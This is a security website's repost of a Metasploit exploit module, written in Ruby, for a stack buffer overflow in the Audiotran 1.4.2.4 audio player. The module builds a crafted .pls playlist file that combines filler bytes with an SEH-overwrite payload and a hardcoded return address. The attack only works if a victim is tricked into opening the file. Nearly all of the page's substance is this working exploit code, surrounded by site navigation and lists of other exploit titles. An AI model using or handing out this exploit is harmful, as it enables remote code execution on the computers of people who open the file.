首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Audiotran PLS File Stack Buffer Overflow
来源:metasploit.com 作者:OKeefe 发布时间:2014-02-20  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking
  
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Audiotran PLS File Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
        An attacker must send the file to victim and the victim must open the file.
        Alternatively, it may be possible to execute code remotely via an embedded
        PLS file within a browser when the PLS extention is registered to Audiotran.
        This alternate vector has not been tested and cannot be exercised directly
        with this module.
      },
      'License'        => MSF_LICENSE,
      'Author'    =>
        [
          'Philip OKeefe',
        ],
      'References'     =>
        [
          [ 'EDB', '14961' ]
        ],
      'Payload'        =>
        {
          'Space'    => 5000,
          'BadChars' => "\x00\x0a\x0d\x3d",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 09 2010',
      'DefaultTarget'  => 0))
  
      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.''msf.pls']),
        ], self.class)
  end
  
  def exploit
    sploit = "[playlist]\r\nFile1="
    sploit << rand_text_alpha_upper(1940)
    sploit << generate_seh_payload(target.ret)
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SolidWorks Workgroup PDM 2014
·MediaWiki Thumb.php Remote Com
·Catia V5-6R2013 "CATV5_AllAppl
·WRT120N 1.0.0.7 Stack Overflow
·WRT120N 1.0.0.7 Stack Overflow
·VideoCharge Studio 2.12.3.685
·Linksys Worm Remote Root
·Catia V5-6R2013 "CATV5_Backbon
·Oracle Forms and Reports Remot
·Eudora Qualcomm WorldMail 9.0.
·Mini HTTPD 1.21 - Stack Buffer
·Linksys E-series Unauthenticat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved